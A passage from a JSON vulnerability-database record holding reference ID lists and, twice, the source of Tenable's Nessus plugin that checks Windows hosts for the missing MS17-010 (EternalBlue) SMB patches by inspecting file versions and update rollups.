"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-19T00:54:29", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-19T00:54:29", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", 
min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows 
Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-19T00:54:29", "differentElements": ["vpr"], "edition": 13}], "viewCount": 2990, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", 
"MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", 
"THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-22T13:01:22", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-22T13:01:22", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n 
script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", 
bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, 